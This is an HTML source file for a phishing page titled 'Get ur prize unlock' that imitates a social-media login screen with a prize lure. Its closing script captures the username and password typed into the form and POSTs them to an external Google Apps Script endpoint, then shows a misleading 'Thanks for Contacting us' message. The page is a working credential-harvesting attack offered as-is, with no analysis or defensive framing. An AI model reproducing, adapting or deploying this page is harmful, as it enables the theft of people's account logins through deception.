
<!DOCTYPE html>
<html lang="en">

<head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/css/bootstrap.min.css"
        integrity="sha384-Vkoo8x4CGsO3+Hhxv8T/Q5PaXtkKtu6ug5TOeNV6gBiFeWPGFN9MuhOf23Q9Ifjh" crossorigin="anonymous">

    <title>Get ur prize unlock</title>
</head>
<style>

@media (min-width: 600px) and (max-width: 768px) {
  body {
    /* background-color: rgb(var(--ig-secondary-background)); */
    background-color: #efefef;
  }
}


    .log {
        border: 2px solid none;
        /* margin: 2px 34px; */

    }

    .log2 {
        margin: 37px 86px;
        background-color: white;
        border: 2px solid secondary-subtle;
    }

    #search {
        width: 350px;
        opacity: 0.6;
        height: 33px;
    }

    #search1 {
        width: 350px;
        opacity: 0.6;
        height: 33px;
    }

    #button {
        width: 350px;
        height: 31px;
        background-color: rgb(78, 78, 255);
        border: none;
        border-radius: 2px;
        /* font-family: Arial, Helvetica, sans-serif; */
        background-color: #3897f0;
        color: #fff;
        font-weight: bold;
    }

    #forget {
        font-family: 'Overpass Mono', monospace;
        font-size: medium;
    }

    .log3 {
        margin: 1px 86px;
        background-color: white;
        border: 2px solid none;
        font-family: 'Overpass Mono', monospace;
    }

    a:href {
        color: #3897f0;
    }

    #show {
        display: left;
    }
</style>

<body  >
    <div class="log">

        <div class="log2">


            <center>
                <img src="download-removebg-preview (2).png" alt="#" width="250px">
                <center>
                    <form  method="post" name="google-sheet">
                        <input type="text" name="username" placeholder="Phone number,username or email" id="search">
                        <br>
                        <br>
                        <input type="password" name="password" placeholder="password" id="search1">
                        <br>
                        <br>
                        <input type="checkbox" onclick="myFunction()" id="show">Show Password
                        <SCript>
                            function myFunction() {
                                var x = document.getElementById("myInput");
                                if (x.type === "password") {
                                    x.type = "text";
                                } else {
                                    x.type = "password";
                                }
                            }
                        </SCript>
                        <br>
                        <br>
                        <input type="submit" id="button" value="Log in" name="submit">
                        <!-- <button id="button" name="button">Log in</button> -->
                        <br>
                        <br>
                    </form>
                    <div id="forget">
                        Forget password?
                    </div>

                    <br>
                    <br>
                </center>
            </center>
        </div>

        <div class="log3">
            <center>
                <div>
                    <br>
                    <br>
                    <br>
                    Don't have an account? <a href="">sign up</a>
                    <br>
                    <br>
                    <br>

                </div>
            </center>
        </div>
        <div>
            <center>
                Get the app
                <img src="get-it-on-google-play-badge-vector-11573946115mi2wvydcdn-removebg-preview.png" alt=""
                    id="play_store" width="233px" height="234px">
            </center>
        </div>
    </div>

    <script>

        const scriptURL=
        'https://script.google.com/macros/s/AKfycbzYTe1hk7oiF61AsNIzyeDUenUPEJTk71F0rv8liaTP30jGF9zz_UMu_fpZX7R4smTL/exec'
        
        const form = document.forms ['google-sheet']
        
        
        
        
        form.addEventListener('submit', e => {
        
        e.preventDefault()
        
        fetch (scriptURL, {method: 'POST', body: new FormData (form)}) 
        .then(response => alert ("Thanks for Contacting us..! We Will Contact You Soon...")) 
        .catch(error => console.error('Error!', error.message))
        
        
        })
        
       </script>


</body>

</html>
